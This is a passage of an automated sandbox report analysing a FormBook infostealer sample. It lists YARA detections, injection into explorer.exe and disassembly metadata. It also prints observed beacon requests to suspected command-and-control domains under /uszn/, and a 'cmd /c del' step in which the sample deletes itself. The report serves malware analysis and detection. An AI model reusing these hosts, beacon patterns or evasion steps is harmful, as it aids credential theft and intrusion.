                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have bee
                                                                        Feb 23, 2021 10:08:08.410028934 CET5583INData Raw: 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e
                                                                        Data Ascii: n removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.449769160.153.136.380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:08:18.614079952 CET5603OUTGET /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.buysellleasewithlisa.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:18.663569927 CET5603INHTTP/1.1 302 Found
                                                                        Connection: close
                                                                        Pragma: no-cache
                                                                        cache-control: no-cache
                                                                        Location: /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.44977094.23.162.16380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:08:23.806049109 CET5604OUTGET /uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.besteprobioticakopen.online
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:23.850476980 CET5604INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                        Date: Tue, 23 Feb 2021 09:08:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 194
                                                                        Connection: close
                                                                        Location: http://www.besteprobioticakopen.online/
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: 0O9BJfVJi6fEMoS.exe PID: 7028 Parent PID: 5904

                                                                        General

                                                                        Start time:10:06:23
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
                                                                        Imagebase:0x6e0000
                                                                        File size:816640 bytes
                                                                        MD5 hash:18EC78E09155C046A203FB4DCBC3593F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: 0O9BJfVJi6fEMoS.exe PID: 5032 Parent PID: 7028

                                                                        General

                                                                        Start time:10:06:41
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:{path}
                                                                        Imagebase:0x310000
                                                                        File size:816640 bytes
                                                                        MD5 hash:18EC78E09155C046A203FB4DCBC3593F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: 0O9BJfVJi6fEMoS.exe PID: 3492 Parent PID: 7028

                                                                        General

                                                                        Start time:10:06:42
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:{path}
                                                                        Imagebase:0xaa0000
                                                                        File size:816640 bytes
                                                                        MD5 hash:18EC78E09155C046A203FB4DCBC3593F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 3492

                                                                        General

                                                                        Start time:10:06:44
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff6fee60000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: autofmt.exe PID: 6664 Parent PID: 3424

                                                                        General

                                                                        Start time:10:07:00
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\autofmt.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                        Imagebase:0xc70000
                                                                        File size:831488 bytes
                                                                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        Chronological Activities

                                                                        Analysis Process: explorer.exe PID: 6700 Parent PID: 3424

                                                                        General

                                                                        Start time:10:07:01
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                        Imagebase:0x13e0000
                                                                        File size:3611360 bytes
                                                                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: cmd.exe PID: 6812 Parent PID: 6700

                                                                        General

                                                                        Start time:10:07:04
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
                                                                        Imagebase:0x11d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: conhost.exe PID: 6824 Parent PID: 6812

                                                                        General

                                                                        Start time:10:07:05
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >

                                                                          Analysis Process: 0O9BJfVJi6fEMoS.exe PID: 7028 Parent PID: 5904 0O9BJfVJi6fEMoS.exeCOMMON

                                                                          Executed Functions

                                                                          Function 0103C7D8, Relevance: 6.1, APIs: 4, Instructions: 139threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0103C848
                                                                          • GetCurrentThread.KERNEL32 ref: 0103C885
                                                                          • GetCurrentProcess.KERNEL32 ref: 0103C8C2
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0103C91B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: f4b01c2b866581ef2b9e59fd049682cd17cb918c2ed4013f1c024905fe1644a7
                                                                          • Instruction ID: c0bd90ab2979f78ee83e95553ed039be8b9e5cd748c99ef7808a287d3091f8ef
                                                                          • Opcode Fuzzy Hash: f4b01c2b866581ef2b9e59fd049682cd17cb918c2ed4013f1c024905fe1644a7
                                                                          • Instruction Fuzzy Hash: C25174B0E002098FEB14DFA9D98879EBBF5BF89314F1085AAE409B7750C7746944CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0103C7E8, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0103C848
                                                                          • GetCurrentThread.KERNEL32 ref: 0103C885
                                                                          • GetCurrentProcess.KERNEL32 ref: 0103C8C2
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0103C91B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 2da01f73a95399aaa75e18cf97d68ff5cd8a7b7f92a4215d8fb94b03cc728d48
                                                                          • Instruction ID: d767206049f38b01609c730b776af0926cc78c63a7a52c34f88c254176c4869f
                                                                          • Opcode Fuzzy Hash: 2da01f73a95399aaa75e18cf97d68ff5cd8a7b7f92a4215d8fb94b03cc728d48
                                                                          • Instruction Fuzzy Hash: AF5143B09002488FEB14CFA9C988B9EBBF5BF89314F20856AE449B3650C774A944CB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 051E60C0, Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $%!l$$%!l
                                                                          • API String ID: 0-1936874252
                                                                          • Opcode ID: 60e11fd604aa138d407982776d31f31a0abd552721d4e3c9ebee1c8a41bb51d0
                                                                          • Instruction ID: 62c39a3deb0441886ec041a74ac464f57303aa9c0510a4aabb92e936d29533d1
                                                                          • Opcode Fuzzy Hash: 60e11fd604aa138d407982776d31f31a0abd552721d4e3c9ebee1c8a41bb51d0
                                                                          • Instruction Fuzzy Hash: C12102317006008FC710EBB8D8499AFBBF7EF85218B458469E51ADB751EF35E9068F91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 051E60B0, Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $%!l$$%!l
                                                                          • API String ID: 0-1936874252
                                                                          • Opcode ID: 1f827adb83a1a2ad62eba10665d331fb850e752c780900db27e882c80face44c
                                                                          • Instruction ID: 99086d764720172e4c7bee3f067b8d29d3d876d22369ca879ce8067037e9da10
                                                                          • Opcode Fuzzy Hash: 1f827adb83a1a2ad62eba10665d331fb850e752c780900db27e882c80face44c
                                                                          • Instruction Fuzzy Hash: C111E1316006008FC710EBA8D5499AFBBF7EFC4214B458529E516DB761EF34EE098F91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0103A4F0, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0103A736
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 34d72caf9105c618668605dd730f047996180723209996e417c64d4ec3e91f3f
                                                                          • Instruction ID: eb359eee06d786d81f9d8f9d87d20eb78658d6305bbcb5188053b007eb76c9bc
                                                                          • Opcode Fuzzy Hash: 34d72caf9105c618668605dd730f047996180723209996e417c64d4ec3e91f3f
                                                                          • Instruction Fuzzy Hash: C5711370A00B058FDB64DF2AD44479ABBF9BF88314F008A6DD58AD7A40D774E946CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01033E8C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 01035421
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: f2a7b72e67ab430869033b87a527ed8cab181d7ee2276043326c219e9a8925b7
                                                                          • Instruction ID: e9cc247f7e39d9018782b0cc90b3ba35e55a3f0d5bda18f25b1290571f0d314f
                                                                          • Opcode Fuzzy Hash: f2a7b72e67ab430869033b87a527ed8cab181d7ee2276043326c219e9a8925b7
                                                                          • Instruction Fuzzy Hash: 624113B0D04218CBDB24DFA9C8447DEBBF5FF88308F208069D549AB255DBB56946CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01035365, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 01035421
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 644bd4deb38b22682f9b418c900f4ccae0d76673eac991ffcb2b5c6d88bd8ac6
                                                                          • Instruction ID: c6d0c99cf0f95affea652ab3b79090be3332db4beb9e19557b22cd9383b31e93
                                                                          • Opcode Fuzzy Hash: 644bd4deb38b22682f9b418c900f4ccae0d76673eac991ffcb2b5c6d88bd8ac6
                                                                          • Instruction Fuzzy Hash: 5E41F2B1D00619CEDB24DFA9C8847DEBBF5BF88308F208069D549AB254DBB5594ACF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0103CA08, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0103CA97
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: c2de477f0842ae9ae9bde3ab697015d1a8d8b2b8bd47479fa7bc4e14a4505d24
                                                                          • Instruction ID: de962ad5cbe17379ba33cbfd8a866d57f026a8000b8c0a064a8012899e2cc23b
                                                                          • Opcode Fuzzy Hash: c2de477f0842ae9ae9bde3ab697015d1a8d8b2b8bd47479fa7bc4e14a4505d24
                                                                          • Instruction Fuzzy Hash: DF2105B5900248AFDB00CF99D984ADEBBF8FB48324F14841AE954B3310C378A945CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0103CA10, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0103CA97
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: bd055f3c1c6852ac10a897d88741d43a66c24c76b44f19e2b4c74bfb41d7c69c
                                                                          • Instruction ID: b24c00faef03785e617fa481665cf3b8c15a6ecc4aa1e7450c9d5c6719f65850
                                                                          • Opcode Fuzzy Hash: bd055f3c1c6852ac10a897d88741d43a66c24c76b44f19e2b4c74bfb41d7c69c
                                                                          • Instruction Fuzzy Hash: 6A21C4B5D002499FDB10CFA9D584ADEBBF8FB48324F14841AE955B3310D378A955CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01039A50, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0103A7B1,00000800,00000000,00000000), ref: 0103A9C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 0c3bf370830a6927640df5e42d286b9a87d1cd292728f1d3340deb0c77395efc
                                                                          • Instruction ID: b9d0743431cac9a4570f970e2261890f3c60709a2daa5da00f816d0a5adb6641
                                                                          • Opcode Fuzzy Hash: 0c3bf370830a6927640df5e42d286b9a87d1cd292728f1d3340deb0c77395efc
                                                                          • Instruction Fuzzy Hash: 241106B6900249CFDB10CF9AC448ADEFBF8EB88324F05846AE555B7600C3B5A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0103A950, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0103A7B1,00000800,00000000,00000000), ref: 0103A9C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: a766583fde95ae11b789bc2b2353e8352445d57189247650dee39a10f16109c1
                                                                          • Instruction ID: 7b41a8055a5611f8fdee58cf252a1e7020d335f2dc934266ff4bd83f5c1190f3
                                                                          • Opcode Fuzzy Hash: a766583fde95ae11b789bc2b2353e8352445d57189247650dee39a10f16109c1
                                                                          • Instruction Fuzzy Hash: 9111D3B69002498FDB10CF99D444BDEBBF4BB88324F15846ED995B7600C379A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0103A6D0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0103A736
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 92c4de6e825dc420eb75c7d0a45b835a25ed354e6b8f31f5ed01c4fefd3bdf01
                                                                          • Instruction ID: 667ff3f609c3f21736e331fbbe7bfe84108762e583bf3836073819cbd423f135
                                                                          • Opcode Fuzzy Hash: 92c4de6e825dc420eb75c7d0a45b835a25ed354e6b8f31f5ed01c4fefd3bdf01
                                                                          • Instruction Fuzzy Hash: 8B11D2B5D002498FDB10CF9AC888BDEFBF8FB89224F14845AD459B7600C379A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 051E92A8, Relevance: .6, Instructions: 634COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ad30c1dd0dc0b8b91a482fdb1aacaa840f45a966c387e116071bcb0ffca0661
                                                                          • Instruction ID: 3bb9b46da6648e845b153242ff5a40a2be6c6ffbdfae5ade1eac1f42416df955
                                                                          • Opcode Fuzzy Hash: 9ad30c1dd0dc0b8b91a482fdb1aacaa840f45a966c387e116071bcb0ffca0661
                                                                          • Instruction Fuzzy Hash: 0762ED31910619CFCB15EF68C898ADDB7B1FF55304F008699D58AA7269EF30AAC5CF81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 051E0040, Relevance: .6, Instructions: 551COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb9f99a2a30ad2c314957237f3fbcb0346aba34e36129806903b2dd631f1cff8
                                                                          • Instruction ID: 64d32605b6e7e0ba3a363fae91103cc0c5f784a300497119c078acfbca57984a
                                                                          • Opcode Fuzzy Hash: eb9f99a2a30ad2c314957237f3fbcb0346aba34e36129806903b2dd631f1cff8
                                                                          • Instruction Fuzzy Hash: E142D931E10619CFCB25DF68C888ADDB7B1BF89314F118699D459BB261EB70AE85CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 051EA790, Relevance: .5, Instructions: 500COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47c8bb6a74088488f8e371b1c619bbd427df1feb35aa934c0c655b26d2800a43
                                                                          • Instruction ID: c7925bca301892453788b3d1fe74364864e098b9c0d149c4fa83326e585eca0e
                                                                          • Opcode Fuzzy Hash: 47c8bb6a74088488f8e371b1c619bbd427df1feb35aa934c0c655b26d2800a43
                                                                          • Instruction Fuzzy Hash: 47223B34A10614CFCB14DF68C888A9DB7F2FF88314F1585A9E95AAB365DB30AD45CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 051E0006, Relevance: .4, Instructions: 352COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71e8ebe1146ac49ef55be38d742b027ec6f4534caee49183d073ad7e1cd51b49
                                                                          • Instruction ID: 91aa5e4ce9fd7ea081f68150bb448133e033c8a6d53bb42776e2bd822c5f6899
                                                                          • Opcode Fuzzy Hash: 71e8ebe1146ac49ef55be38d742b027ec6f4534caee49183d073ad7e1cd51b49
